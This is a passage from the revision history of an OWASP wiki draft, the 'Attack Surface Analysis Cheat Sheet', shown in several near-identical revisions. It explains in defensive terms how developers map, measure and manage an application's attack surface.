* HTTP headers and cookies<br />
* APIs<br />
* Files<br />
* Databases<br />
* email or other kinds of messages<br />
* run-time arguments<br />
* ….?<br />
<br />
The total number of different attack points can easily add up into the thousands or more. To make this manageable, break the model into different types based on function, design and technology:<br />
* Login/authentication entry points<br />
* Admin interfaces<br />
* Inquiries and search functions<br />
* Data entry (CRUD) forms<br />
* Business workflows<br />
* Transactional interfaces/APIs<br />
* Operational command and monitoring interfaces/APIs<br />
* ...<br />
<br />
You also need to identify the confidential and sensitive data in the application, by interviewing developers and users of the system and again by reviewing the source code. <br />
<br />
You can build up a picture of the Attack Surface by scanning the application. For web apps you can use a tool like Arachni or Skipfish or w3af or one of the many commercial dynamic testing and vulnerability scanning tools or services to crawl your app and map the parts of the application that are accessible over the web. <br />
<br />
Validate and fill in your understanding of the Attack Surface by walking through some of the main use cases in the system: logging in, searching for an item, placing an order, changing an order, and so on. Follow the flow of control and data through the system, see how information is validated and where it is stored, what resources are touched and what other systems are involved. There is a recursive relationship between Attack Surface Analysis and [[Application Threat Modeling]]: changes to the Attack Surface should trigger threat modeling, and threat modeling helps you to understand the Attack Surface of the application.<br />
<br />
The Attack Surface model may be rough and incomplete to start, especially if you haven’t done any security work on the application before. Fill in the holes as you dig deeper in a security analysis, or as you work more with the application and realize that your understanding of the Attack Surface has improved.<br />
<br />
= Measuring and Assessing the Attack Surface =<br />
<br />
Once you have a map of the Attack Surface, identify the high risk areas. Focus on remote entry points – interfaces with outside systems and to the Internet – and especially where the system allows anonymous, public access. <br />
* Network-facing, especially internet-facing code<br />
* Web forms<br />
* Files from outside of the network<br />
* Backwards compatible interfaces with other systems – old protocols, sometimes old code and libraries, hard to maintain and test multiple versions<br />
* Custom APIs – protocols etc – likely to have mistakes in design and implementation<br />
* Security code: anything to do with crypto, authentication and session management<br />
<br />
This is where you are most exposed to attack. Then understand what compensating controls you have in place, operational controls like network firewalls and application firewalls,and intrusion detection or prevention systems to help protect your app.<br />
<br />
Michael Howard at Microsoft and other researchers have developed a method for measuring the Attack Surface of an application, and to track changes to the Attack Surface over time, called the [http://www.cs.cmu.edu/~wing/publications/Howard-Wing03.pdf Relative Attack Surface Quotient (RSQ)]. Using this method you calculate an overall attack surface score for the system, and measure this score as changes are made to the system and to how it is deployed. Researchers at Carnegie Mellon built on this work to develop a formal way to calculate an [http://www.cs.cmu.edu/~pratyus/tse10.pdf Attack Surface Metric] for large systems like SAP. They calculate the Attack Surface as the sum of all entry and exit points, channels (the different ways that clients or external systems connect to the system, including TCP/UDP ports, RPC end points, named pipes...) and untrusted data elements. Then they apply a damage potential/effort ratio to these Attack Surface elements to identify high-risk areas.<br />
<br />
= Managing the Attack Surface =<br />
<br />
Once you have a baseline understanding of the Attack Surface, you can use it to incrementally identify and manage risks going forward as you make changes to the application. Ask yourself:<br />
* What has changed? <br />
* What are you doing different? (technology, new approach, ….)<br />
* What holes could you have opened?<br />
<br />
The first web page that you create opens up the system’s Attack Surface significantly and introduces all kinds of new risks. If you add another field to that page, or another web page like it, while technically you have made the Attack Surface bigger, you haven’t increased the risk profile of the application in a meaningful way. Each of these incremental changes is more of the same, unless you follow a new design or use a new framework.<br />
<br />
If you add another web page that follows the same design and using the same technology as existing web pages, it's easy to understand how much security testing and review it needs. If you add a new web services API or file that can be uploaded from the Internet, each of these changes have a different risk profile again - see if if the change fits in an existing bucket, see if the existing controls and protections apply. If you're adding something that doesn't fall into an existing bucket, this means that you have to go through a more thorough risk assessment to understand what kind of security holes you may open and what protections you need to put in place. <br />
<br />
Changes to session management and authentication and password management directly affect the Attack Surface and need to be reviewed. So do changes to authorization and access control logic, especially adding or changing role definitions, adding admin users or admin functions with high privileges. Changes to the code that handles encryption and secrets. Fundamental changes to how data validation is done. And major architectural changes to layering and trust relationships, or fundamental changes in technical architecture – swapping out your web server or database platform, or changing the run-time OS. <br />
<br />
As you add new user types or roles or privilege levels, you do the same kind of analysis and risk assessment. Overlay the type of access across the data and functions and look for problems and inconsistencies. It's important to understand the access model for the application, whether it is positive (access is deny by default) or negative (access is allow by default). In a positive access model, any mistakes in defining what data or functions are permitted to a new user type or role are easy to see. In a negative access model,you have to be much more careful to ensure that a user does not get access to data/functions that they should not be permitted to.<br />
<br />
This kind of threat or risk assessment can be done periodically, or as a part of design work in serial / phased / spiral / waterfall development projects, or continuously and incrementally in Agile / iterative development.<br />
<br />
Normally, an application's Attack Surface will increase over time as you add more interfaces and user types and integrate with other systems. You also want to look for ways to reduce the size of the Attack Surface when you can by simplifying the model (reducing the number of user levels for example or not storing confidential data that you don't absolutely have to), turning off features and interfaces that aren't being used, by introducing operational controls such as a Web Application Firewall (WAF).<br />
<br />
= Related Articles =<br />
<br />
OWASP CLASP Identifying the Attack Surface: [[Identify attack surface]]<br />
<br><br />
OWASP Principles Minimize Attack Surface area: [[Minimize attack surface area]]<br />
<br><br />
Mitigate Security Risks by Minimizing the Code You Expose to Untrusted Users, Michael Howard http://msdn.microsoft.com/en-us/magazine/cc163882.aspx<br />
<br />
= Authors and Primary Editors =<br />
<br />
Jim Bird jimbird[at]shaw.ca<br />
<br><br />
Jim Manico - jim[at]owasp.org<br />
<br />
= Other Cheatsheets =<br />
{{Cheatsheet_Navigation}}<br />
<br />
[[Category:Cheatsheets]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=Attack_Surface_Analysis_Cheat_Sheet&diff=135367Attack Surface Analysis Cheat Sheet2012-09-05T16:58:09Z<p>Jim Bird: </p>
<hr />
<div>= DRAFT CHEAT SHEET - WORK IN PROGRESS =<br />
= What is Attack Surface Analysis and Why is it Important? =<br />
<br />
This article describes a simple and pragmatic way of doing Attack Surface Analysis and managing an application's Attack Surface. It is targeted to be used by developers to understand and manage application security risks as they design and change an application, as well as by application security specialists doing a security risk assessment. The focus here is on protecting an application from external attack - it does not take into account attacks on the users or operators of the system (social engineering attacks for example), and there is less focus on insider threats.<br />
<br />
Attack Surface Analysis is about mapping out what parts of a system need to be reviewed and tested for security vulnerabilities. The point of Attack Surface Analysis is to understand the risk areas in an application, to make developers and security specialists aware of what parts of the application are open to attack, to find ways of minimizing this, and to notice when and how the Attack Surface changes and what this means from a risk perspective.<br />
<br />
Attack Surface Analysis helps you to:<br />
# identify what functions and what parts of the system you need to review/test for security vulnerabilities<br />
# identify high risk areas of code that require defense-in-depth protection - what parts of the system that you need to defend<br />
# identify when you’ve changed the attack surface and need to do some kind of threat assessment<br />
<br />
= Defining the Attack Surface of an Application =<br />
<br />
The Attack Surface describes all of the different points where an attacker could get into a system, and where they could get data out.<br />
<br />
The Attack Surface of an application is:<br />
# the sum of all paths for data/commands into and out of the application, and <br />
# the code that protects these paths (including resource connection and authentication, authorization, activity logging, data validation and encoding); and <br />
# all confidential and sensitive data used in the application, including secrets and keys, critical business data and PII, and <br />
# the code that protects these data (including encryption and checksums, access auditing, and data integrity and operational security controls).<br />
<br />
You overlay this model with the different types of users - roles, privilege levels - that can use the system. Complexity increases with the number of different types of users. But it is important to focus especially on the two extremes: unauthenticated, anonymous users and highly privileged admin users. <br />
<br />
Group each type of attack point into buckets based on risk (Internet-facing or internal-facing), purpose, implementation, design and technology. You can then count the number of attack points of each type, then choose some cases for each type, and focus your review/assessment on those cases.<br />
<br />
With this approach, you don't need to understand every endpoint in order to understand the Attack Surface and the potential risk profile of a system. Instead, you can count the different general type of endpoints and the number of points of each type. With this you can budget what it will take to assess risk at scale, and you can tell when the risk profile of an application has significantly changed.<br />
<br />
= Identifying and Mapping the Attack Surface =<br />
<br />
You can start by capturing the Attack Surface baseline in a picture and notes. Spend a few hours reviewing design and architecture documents from an attacker's perspective. Read through the source code and identify different points of entry/exit:<br />
* UI forms and fields<br />
* HTTP headers and cookies<br />
* APIs<br />
* Files<br />
* Databases<br />
* email or other kinds of messages<br />
* run-time arguments<br />
* ….?<br />
<br />
The total number of different attack points can easily add up into the thousands or more. To make this manageable, break the model into different types based on function, design and technology:<br />
* Login/authentication entry points<br />
* Admin interfaces<br />
* Inquiries and search functions<br />
* Data entry (CRUD) forms<br />
* Business workflows<br />
* Transactional interfaces/APIs<br />
* Operational command and monitoring interfaces/APIs<br />
* ...<br />
<br />
You also need to identify the confidential and sensitive data in the application, by interviewing developers and users of the system and again by reviewing the source code.<br />
<br />
You can build up a picture of the Attack Surface by scanning the application. For web apps you can use a tool like Arachni or Skipfish or w3af or one of the many commercial dynamic testing and vulnerability scanning tools or services to crawl your app and map the parts of the application that are accessible over the web. <br />
<br />
Validate and fill in your understanding of the Attack Surface by walking through some of the main use cases in the system: logging in, searching for an item, placing an order, changing an order, and so on. Follow the flow of control and data through the system, see how information is validated and where it is stored, what resources are touched and what other systems are involved. There is a recursive relationship between Attack Surface Analysis and [[Application Threat Modeling]]: changes to the Attack Surface should trigger threat modeling, and threat modeling helps you to understand the Attack Surface of the application.<br />
<br />
The Attack Surface model may be rough and incomplete to start, especially if you haven’t done any security work on the application before. Fill in the holes as you dig deeper in a security analysis, or as you work more with the application and realize that your understanding of the Attack Surface has improved.<br />
<br />
= Measuring and Assessing the Attack Surface =<br />
<br />
Once you have a map of the Attack Surface, identify the high risk areas. Focus on remote entry points – interfaces with outside systems and to the Internet – and especially where the system allows anonymous, public access. <br />
* Network-facing, especially internet-facing code<br />
* Web forms<br />
* Files from outside of the network<br />
* Backwards compatible interfaces with other systems – old protocols, sometimes old code and libraries, hard to maintain and test multiple versions<br />
* Custom APIs – protocols etc – likely to have mistakes in design and implementation<br />
* Security code: anything to do with crypto, authentication and session management<br />
<br />
This is where you are most exposed to attack. Then understand what compensating controls you have in place, operational controls like network firewalls and application firewalls,and intrusion detection or prevention systems to help protect your app.<br />
<br />
Michael Howard at Microsoft and other researchers have developed a method for measuring the Attack Surface of an application, and to track changes to the Attack Surface over time, called the [http://www.cs.cmu.edu/~wing/publications/Howard-Wing03.pdf Relative Attack Surface Quotient (RSQ)]. Using this method you calculate an overall attack surface score for the system, and measure this score as changes are made to the system and to how it is deployed. Researchers at Carnegie Mellon built on this work to develop a formal way to calculate an [http://www.cs.cmu.edu/~pratyus/tse10.pdf Attack Surface Metric] for large systems like SAP. They calculate the Attack Surface as the sum of all entry and exit points, channels (the different ways that clients or external systems connect to the system, including TCP/UDP ports, RPC end points, named pipes...) and untrusted data elements. Then they apply a damage potential/effort ratio to these Attack Surface elements to identify high-risk areas.<br />
<br />
= Managing the Attack Surface =<br />
<br />
Once you have a baseline understanding of the Attack Surface, you can use it to incrementally identify and manage risks going forward as you make changes to the application. Ask yourself:<br />
* What has changed? <br />
* What are you doing different? (technology, new approach, ….)<br />
* What holes could you have opened?<br />
<br />
The first web page that you create opens up the system’s Attack Surface significantly and introduces all kinds of new risks. If you add another field to that page, or another web page like it, while technically you have made the Attack Surface bigger, you haven’t increased the risk profile of the application in a meaningful way. Each of these incremental changes is more of the same, unless you follow a new design or use a new framework.<br />
<br />
If you add another web page that follows the same design and using the same technology as existing web pages, it's easy to understand how much security testing and review it needs. If you add a new web services API or file that can be uploaded from the Internet, each of these changes have a different risk profile again - see if if the change fits in an existing bucket, see if the existing controls and protections apply. If you're adding something that doesn't fall into an existing bucket, this means that you have to go through a more thorough risk assessment to understand what kind of security holes you may open and what protections you need to put in place. <br />
<br />
Changes to session management and authentication and password management directly affect the Attack Surface and need to be reviewed. So do changes to authorization and access control logic, especially adding or changing role definitions, adding admin users or admin functions with high privileges. Changes to the code that handles encryption and secrets. Fundamental changes to how data validation is done. And major architectural changes to layering and trust relationships, or fundamental changes in technical architecture – swapping out your web server or database platform, or changing the run-time OS. <br />
<br />
As you add new user types or roles or privilege levels, you do the same kind of analysis and risk assessment. Overlay the type of access across the data and functions and look for problems and inconsistencies. It's important to understand the access model for the application, whether it is positive (access is deny by default) or negative (access is allow by default). In a positive access model, any mistakes in defining what data or functions are permitted to a new user type or role are easy to see. In a negative access model,you have to be much more careful to ensure that a user does not get access to data/functions that they should not be permitted to.<br />
<br />
This kind of threat or risk assessment can be done periodically, or as a part of design work in serial / phased / spiral / waterfall development projects, or continuously and incrementally in Agile / iterative development.<br />
<br />
Normally, an application's Attack Surface will increase over time as you add more interfaces and user types and integrate with other systems. You also want to look for ways to reduce the size of the Attack Surface when you can by simplifying the model (reducing the number of user levels for example or not storing confidential data that you don't absolutely have to), turning off features and interfaces that aren't being used, by introducing operational controls such as a Web Application Firewall (WAF).<br />
<br />
= Related Articles =<br />
<br />
OWASP CLASP Identifying the Attack Surface: [[Identify attack surface]]<br />
<br><br />
OWASP Principles Minimize Attack Surface area: [[Minimize attack surface area]]<br />
<br><br />
Mitigate Security Risks by Minimizing the Code You Expose to Untrusted Users, Michael Howard http://msdn.microsoft.com/en-us/magazine/cc163882.aspx<br />
<br />
= Authors and Primary Editors =<br />
<br />
Jim Bird jimbird[at]shaw.ca<br />
<br><br />
Jim Manico - jim[at]owasp.org<br />
<br />
= Other Cheatsheets =<br />
{{Cheatsheet_Navigation}}<br />
<br />
[[Category:Cheatsheets]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=Attack_Surface_Analysis_Cheat_Sheet&diff=135366Attack Surface Analysis Cheat Sheet2012-09-05T16:57:44Z<p>Jim Bird: </p>
<hr />
<div>= DRAFT CHEAT SHEET - WORK IN PROGRESS =<br />
= What is Attack Surface Analysis and Why is it Important =<br />
<br />
This article describes a simple and pragmatic way of doing Attack Surface Analysis and managing an application's Attack Surface. It is targeted to be used by developers to understand and manage application security risks as they design and change an application, as well as by application security specialists doing a security risk assessment. The focus here is on protecting an application from external attack - it does not take into account attacks on the users or operators of the system (social engineering attacks for example), and there is less focus on insider threats.<br />
<br />
Attack Surface Analysis is about mapping out what parts of a system need to be reviewed and tested for security vulnerabilities. The point of Attack Surface Analysis is to understand the risk areas in an application, to make developers and security specialists aware of what parts of the application are open to attack, to find ways of minimizing this, and to notice when and how the Attack Surface changes and what this means from a risk perspective.<br />
<br />
Attack Surface Analysis helps you to:<br />
# identify what functions and what parts of the system you need to review/test for security vulnerabilities<br />
# identify high risk areas of code that require defense-in-depth protection - what parts of the system that you need to defend<br />
# identify when you’ve changed the attack surface and need to do some kind of threat assessment<br />
<br />
= Defining the Attack Surface of an Application =<br />
<br />
The Attack Surface describes all of the different points where an attacker could get into a system, and where they could get data out.<br />
<br />
The Attack Surface of an application is:<br />
# the sum of all paths for data/commands into and out of the application, and <br />
# the code that protects these paths (including resource connection and authentication, authorization, activity logging, data validation and encoding); and <br />
# all confidential and sensitive data used in the application, including secrets and keys, critical business data and PII, and <br />
# the code that protects these data (including encryption and checksums, access auditing, and data integrity and operational security controls).<br />
<br />
You overlay this model with the different types of users - roles, privilege levels - that can use the system. Complexity increases with the number of different types of users. But it is important to focus especially on the two extremes: unauthenticated, anonymous users and highly privileged admin users. <br />
<br />
Group each type of attack point into buckets based on risk (Internet-facing or internal-facing), purpose, implementation, design and technology. You can then count the number of attack points of each type, then choose some cases for each type, and focus your review/assessment on those cases.<br />
<br />
With this approach, you don't need to understand every endpoint in order to understand the Attack Surface and the potential risk profile of a system. Instead, you can count the different general type of endpoints and the number of points of each type. With this you can budget what it will take to assess risk at scale, and you can tell when the risk profile of an application has significantly changed.<br />
<br />
= Identifying and Mapping the Attack Surface =<br />
<br />
You can start by capturing the Attack Surface baseline in a picture and notes. Spend a few hours reviewing design and architecture documents from an attacker's perspective. Read through the source code and identify different points of entry/exit:<br />
* UI forms and fields<br />
* HTTP headers and cookies<br />
* APIs<br />
* Files<br />
* Databases<br />
* email or other kinds of messages<br />
* run-time arguments<br />
* ….?<br />
<br />
The total number of different attack points can easily add up into the thousands or more. To make this manageable, break the model into different types based on function, design and technology:<br />
* Login/authentication entry points<br />
* Admin interfaces<br />
* Inquiries and search functions<br />
* Data entry (CRUD) forms<br />
* Business workflows<br />
* Transactional interfaces/APIs<br />
* Operational command and monitoring interfaces/APIs<br />
* ...<br />
<br />
You also need to identify the confidential and sensitive data in the application, by interviewing developers and users of the system and again by reviewing the source code.<br />
<br />
You can build up a picture of the Attack Surface by scanning the application. For web apps you can use a tool like Arachni or Skipfish or w3af or one of the many commercial dynamic testing and vulnerability scanning tools or services to crawl your app and map the parts of the application that are accessible over the web. <br />
<br />
Validate and fill in your understanding of the Attack Surface by walking through some of the main use cases in the system: logging in, searching for an item, placing an order, changing an order, and so on. Follow the flow of control and data through the system, see how information is validated and where it is stored, what resources are touched and what other systems are involved. There is a recursive relationship between Attack Surface Analysis and [[Application Threat Modeling]]: changes to the Attack Surface should trigger threat modeling, and threat modeling helps you to understand the Attack Surface of the application.<br />
<br />
The Attack Surface model may be rough and incomplete to start, especially if you haven’t done any security work on the application before. Fill in the holes as you dig deeper in a security analysis, or as you work more with the application and realize that your understanding of the Attack Surface has improved.<br />
<br />
= Measuring and Assessing the Attack Surface =<br />
<br />
Once you have a map of the Attack Surface, identify the high risk areas. Focus on remote entry points – interfaces with outside systems and to the Internet – and especially where the system allows anonymous, public access. <br />
* Network-facing, especially internet-facing code<br />
* Web forms<br />
* Files from outside of the network<br />
* Backwards compatible interfaces with other systems – old protocols, sometimes old code and libraries, hard to maintain and test multiple versions<br />
* Custom APIs – protocols etc – likely to have mistakes in design and implementation<br />
* Security code: anything to do with crypto, authentication and session management<br />
<br />
This is where you are most exposed to attack. Then understand what compensating controls you have in place, operational controls like network firewalls and application firewalls,and intrusion detection or prevention systems to help protect your app.<br />
<br />
Michael Howard at Microsoft and other researchers have developed a method for measuring the Attack Surface of an application, and to track changes to the Attack Surface over time, called the [http://www.cs.cmu.edu/~wing/publications/Howard-Wing03.pdf Relative Attack Surface Quotient (RSQ)]. Using this method you calculate an overall attack surface score for the system, and measure this score as changes are made to the system and to how it is deployed. Researchers at Carnegie Mellon built on this work to develop a formal way to calculate an [http://www.cs.cmu.edu/~pratyus/tse10.pdf Attack Surface Metric] for large systems like SAP. They calculate the Attack Surface as the sum of all entry and exit points, channels (the different ways that clients or external systems connect to the system, including TCP/UDP ports, RPC end points, named pipes...) and untrusted data elements. Then they apply a damage potential/effort ratio to these Attack Surface elements to identify high-risk areas.<br />
<br />
= Managing the Attack Surface =<br />
<br />
Once you have a baseline understanding of the Attack Surface, you can use it to incrementally identify and manage risks going forward as you make changes to the application. Ask yourself:<br />
* What has changed? <br />
* What are you doing different? (technology, new approach, ….)<br />
* What holes could you have opened?<br />
<br />
The first web page that you create opens up the system’s Attack Surface significantly and introduces all kinds of new risks. If you add another field to that page, or another web page like it, while technically you have made the Attack Surface bigger, you haven’t increased the risk profile of the application in a meaningful way. Each of these incremental changes is more of the same, unless you follow a new design or use a new framework.<br />
<br />
If you add another web page that follows the same design and using the same technology as existing web pages, it's easy to understand how much security testing and review it needs. If you add a new web services API or file that can be uploaded from the Internet, each of these changes have a different risk profile again - see if if the change fits in an existing bucket, see if the existing controls and protections apply. If you're adding something that doesn't fall into an existing bucket, this means that you have to go through a more thorough risk assessment to understand what kind of security holes you may open and what protections you need to put in place. <br />
<br />
Changes to session management and authentication and password management directly affect the Attack Surface and need to be reviewed. So do changes to authorization and access control logic, especially adding or changing role definitions, adding admin users or admin functions with high privileges. Changes to the code that handles encryption and secrets. Fundamental changes to how data validation is done. And major architectural changes to layering and trust relationships, or fundamental changes in technical architecture – swapping out your web server or database platform, or changing the run-time OS. <br />
<br />
As you add new user types or roles or privilege levels, you do the same kind of analysis and risk assessment. Overlay the type of access across the data and functions and look for problems and inconsistencies. It's important to understand the access model for the application, whether it is positive (access is deny by default) or negative (access is allow by default). In a positive access model, any mistakes in defining what data or functions are permitted to a new user type or role are easy to see. In a negative access model,you have to be much more careful to ensure that a user does not get access to data/functions that they should not be permitted to.<br />
<br />
This kind of threat or risk assessment can be done periodically, or as a part of design work in serial / phased / spiral / waterfall development projects, or continuously and incrementally in Agile / iterative development.<br />
<br />
Normally, an application's Attack Surface will increase over time as you add more interfaces and user types and integrate with other systems. You also want to look for ways to reduce the size of the Attack Surface when you can by simplifying the model (reducing the number of user levels for example or not storing confidential data that you don't absolutely have to), turning off features and interfaces that aren't being used, by introducing operational controls such as a Web Application Firewall (WAF).<br />
<br />
= Related Articles =<br />
<br />
OWASP CLASP Identifying the Attack Surface: [[Identify attack surface]]<br />
<br><br />
OWASP Principles Minimize Attack Surface area: [[Minimize attack surface area]]<br />
<br><br />
Mitigate Security Risks by Minimizing the Code You Expose to Untrusted Users, Michael Howard http://msdn.microsoft.com/en-us/magazine/cc163882.aspx<br />
<br />
= Authors and Primary Editors =<br />
<br />
Jim Bird jimbird[at]shaw.ca<br />
<br><br />
Jim Manico - jim[at]owasp.org<br />
<br />
= Other Cheatsheets =<br />
{{Cheatsheet_Navigation}}<br />
<br />
[[Category:Cheatsheets]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=Attack_Surface_Analysis_Cheat_Sheet&diff=134904Attack Surface Analysis Cheat Sheet2012-08-27T20:57:40Z<p>Jim Bird: </p>
<hr />
<div>= DRAFT CHEAT SHEET - WORK IN PROGRESS =<br />
= Introduction =<br />
<br />
This article describes a simple and pragmatic way of doing Attack Surface Analysis and managing an application's Attack Surface. It is targeted to be used by developers to understand and manage application security risks as they design and change an application, as well as by application security specialists doing a security risk assessment. The focus here is on protecting an application from external attack - it does not take into account attacks on the users or operators of the system (social engineering attacks for example), and there is less focus on insider threats.<br />
<br />
Attack Surface Analysis is about mapping out what parts of a system need to be reviewed and tested for security vulnerabilities. The point of Attack Surface Analysis is to understand the risk areas in an application, to make developers and security specialists aware of what parts of the application are open to attack, to find ways of minimizing this, and to notice when and how the Attack Surface changes and what this means from a risk perspective.<br />
<br />
Attack Surface Analysis helps you to:<br />
# identify what you need to review/test for security vulnerabilities<br />
# identify high risk areas of code that require defense-in-depth protection<br />
# identify when you’ve changed the attack surface and need to do some kind of threat assessment<br />
<br />
= Defining the Attack Surface of an Application =<br />
<br />
The Attack Surface describes all of the different points where an attacker could get into a system, and where they could get data out.<br />
<br />
The Attack Surface of an application is:<br />
# the sum of all paths for data/commands into and out of the application, and <br />
# the code that protects these paths (including resource connection and authentication, authorization, activity logging, data validation and encoding); and <br />
# all confidential and sensitive data used in the application, including secrets and keys, critical business data and PII, and <br />
# the code that protects these data (including encryption and checksums, access auditing, and data integrity and operational security controls).<br />
<br />
You overlay this model with the different types of users - roles, privilege levels - that can use the system. Complexity increases with the number of different types of users. But it is important to focus especially on the two extremes: unauthenticated, anonymous users and highly privileged admin users. <br />
<br />
Group each type of attack point into buckets based on risk (Internet-facing or internal-facing), purpose, implementation, design and technology. You can then count the number of attack points of each type, then choose some cases for each type, and focus your review/assessment on those cases.<br />
<br />
With this approach, you don't need to understand every endpoint in order to understand the Attack Surface and the potential risk profile of a system. Instead, you can count the different general type of endpoints and the number of points of each type. With this you can budget what it will take to assess risk at scale, and you can tell when the risk profile of an application has significantly changed.<br />
<br />
= Identifying and Mapping the Attack Surface =<br />
<br />
You can start by capturing the Attack Surface baseline in a picture and notes. Spend a few hours reviewing design and architecture documents from an attacker's perspective. Read through the source code and identify different points of entry/exit:<br />
* UI forms and fields<br />
* HTTP headers and cookies<br />
* APIs<br />
* Files<br />
* Databases<br />
* email or other kinds of messages<br />
* run-time arguments<br />
* ….?<br />
<br />
The total number of different attack points can easily add up into the thousands or more. To make this manageable, break the model into different types based on function, design and technology:<br />
* Login/authentication entry points<br />
* Admin interfaces<br />
* Inquiries and search functions<br />
* Data entry (CRUD) forms<br />
* Business workflows<br />
* Transactional interfaces/APIs<br />
* Operational command and monitoring interfaces/APIs<br />
* ...<br />
<br />
You also need to identify the confidential and sensitive data in the application, by interviewing developers and users of the system and again by reviewing the source code.<br />
<br />
You can also build up a picture of the Attack Surface by scanning the application. For web apps you can use a tool like Arachni or Skipfish or w3af or one of the many commercial dynamic testing and vulnerability scanning tools or services to crawl your app and map the parts of the application that are accessible over the web. <br />
<br />
The Attack Surface model may be rough and incomplete to start, especially if you haven’t done any security work on the application before. Fill in the holes as you dig deeper in a security analysis, or as you work more with the application and make changes and realize that your understanding of the Attack Surface has changed.<br />
<br />
= Measuring and Assessing the Attack Surface =<br />
<br />
Once you have a map of the Attack Surface, identify the high risk areas. Focus on remote entry points – interfaces with outside systems and to the Internet – and especially where the system allows anonymous, public access. <br />
* Network-facing, especially internet-facing code<br />
* Web forms<br />
* Files from outside of the network<br />
* Backwards compatible interfaces with other systems – old protocols, sometimes old code and libraries, hard to maintain and test multiple versions<br />
* Custom APIs – protocols etc – likely to have mistakes in design and implementation<br />
* Security code: anything to do with crypto, authentication and session management<br />
<br />
This is where you are most exposed to attack. Then understand what compensating controls you have in place, operational controls like network firewalls and application firewalls,and intrusion detection or prevention systems to help protect your app.<br />
<br />
Michael Howard at Microsoft and other researchers have developed a method for measuring the Attack Surface of an application, and to track changes to the Attack Surface over time, called the [http://www.cs.cmu.edu/~wing/publications/Howard-Wing03.pdf Relative Attack Surface Quotient (RSQ)]. Using this method you calculate an overall attack surface score for the system, and measure this score as changes are made to the system and to how it is deployed. Researchers at Carnegie Mellon built on this work to develop a formal way to calculate an [http://www.cs.cmu.edu/~pratyus/tse10.pdf Attack Surface Metric] for large systems like SAP. They calculate the Attack Surface as the sum of all entry and exit points, channels (the different ways that clients or external systems connect to the system, including TCP/UDP ports, RPC end points, named pipes...) and untrusted data elements. Then they apply a damage potential/effort ratio to these Attack Surface elements to identify high-risk areas.<br />
<br />
= Managing the Attack Surface =<br />
<br />
Once you have a baseline understanding of the Attack Surface, you can use it to incrementally identify and manage risks going forward as you make changes to the application. Ask yourself:<br />
* What has changed? <br />
* What are you doing different? (technology, new approach, ….)<br />
* What holes could you have opened?<br />
<br />
The first web page that you create opens up the system’s Attack Surface significantly and introduces all kinds of new risks. If you add another field to that page, or another web page like it, while technically you have made the Attack Surface bigger, you haven’t increased the risk profile of the application in a meaningful way. Each of these incremental changes is more of the same, unless you follow a new design or use a new framework.<br />
<br />
If you add another web page that follows the same design and using the same technology as existing web pages, it's easy to understand how much security testing and review it needs. If you add a new web services API or file that can be uploaded from the Internet, each of these changes have a different risk profile again - see if if the change fits in an existing bucket, see if the existing controls and protections apply. If you're adding something that doesn't fall into an existing bucket, this means that you have to go through a more thorough risk assessment to understand what kind of security holes you may open and what protections you need to put in place. <br />
<br />
Changes to session management and authentication and password management directly affect the Attack Surface and need to be reviewed. So do changes to authorization and access control logic, especially adding or changing role definitions, adding admin users or admin functions with high privileges. Changes to the code that handles encryption and secrets. Fundamental changes to how data validation is done. And major architectural changes to layering and trust relationships, or fundamental changes in technical architecture – swapping out your web server or database platform, or changing the run-time OS. <br />
<br />
As you add new user types or roles or privilege levels, you do the same kind of analysis and risk assessment. Overlay the type of access across the data and functions and look for problems and inconsistencies. It's important to understand the access model for the application, whether it is positive (access is deny by default) or negative (access is allow by default). In a positive access model, any mistakes in defining what data or functions are permitted to a new user type or role are easy to see. In a negative access model,you have to be much more careful to ensure that a user does not get access to data/functions that they should not be permitted to.<br />
<br />
This kind of threat or risk assessment can be done periodically, or as a part of design work in serial / phased / spiral / waterfall development projects, or continuously and incrementally in Agile / iterative development.<br />
<br />
Normally, an application's Attack Surface will increase over time as you add more interfaces and user types and integrate with other systems. You also want to look for ways to reduce the size of the Attack Surface when you can by simplifying the model (reducing the number of user levels for example or not storing confidential data that you don't absolutely have to), turning off features and interfaces that aren't being used, by introducing operational controls such as a Web Application Firewall (WAF).<br />
<br />
= Related Articles =<br />
<br />
OWASP CLASP Identifying the Attack Surface: [[Identify attack surface]]<br />
<br><br />
OWASP Principles Minimize Attack Surface area: [[Minimize attack surface area]]<br />
<br><br />
Mitigate Security Risks by Minimizing the Code You Expose to Untrusted Users, Michael Howard http://msdn.microsoft.com/en-us/magazine/cc163882.aspx<br />
<br />
= Authors and Primary Editors =<br />
<br />
Jim Bird jimbird[at]shaw.ca<br />
<br><br />
Jim Manico - jim[at]owasp.org<br />
<br />
= Other Cheatsheets =<br />
{{Cheatsheet_Navigation}}<br />
<br />
[[Category:Cheatsheets]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=Attack_Surface_Analysis_Cheat_Sheet&diff=134903Attack Surface Analysis Cheat Sheet2012-08-27T20:32:58Z<p>Jim Bird: </p>
<hr />
<div>= DRAFT CHEAT SHEET - WORK IN PROGRESS =<br />
= Introduction =<br />
<br />
This article describes a simple and pragmatic way of doing Attack Surface Analysis and managing an application's Attack Surface. It is targeted to be used by developers to understand and manage application security risks as they design and change an application, as well as by application security specialists doing a security risk assessment. The focus here is on protecting an application from external attack - it does not take into account attacks on the users or operators of the system (social engineering attacks for example), and there is less focus on insider threats.<br />
<br />
Attack Surface Analysis is about mapping out what parts of a system need to be reviewed and tested for security vulnerabilities. The point of Attack Surface Analysis is to understand the risk areas in an application, to make developers and security specialists aware of what parts of the application are open to attack, to find ways of minimizing this, and to notice when and how the Attack Surface changes and what this means from a risk perspective.<br />
<br />
Attack Surface Analysis helps you to:<br />
# identify what you need to review/test for security vulnerabilities<br />
# identify high risk areas of code that require defense-in-depth protection<br />
# identify when you’ve changed the attack surface and need to do some kind of threat assessment<br />
<br />
= Defining the Attack Surface of an Application =<br />
<br />
The Attack Surface describes all of the different points where an attacker could get into a system, and where they could get data out.<br />
<br />
The Attack Surface of an application is:<br />
# the sum of all paths for data/commands into and out of the application, and <br />
# the code that protects these paths (including resource connection and authentication, authorization, activity logging, data validation and encoding); and <br />
# all confidential and sensitive data used in the application, including secrets and keys, critical business data and PII, and <br />
# the code that protects these data (including encryption and checksums, access auditing, and data integrity and operational security controls).<br />
<br />
You overlay this model with the different types of users - roles, privilege levels - that can use the system. Complexity increases with the number of different types of users. But it is important to focus especially on the two extremes: unauthenticated, anonymous users and highly privileged admin users. <br />
<br />
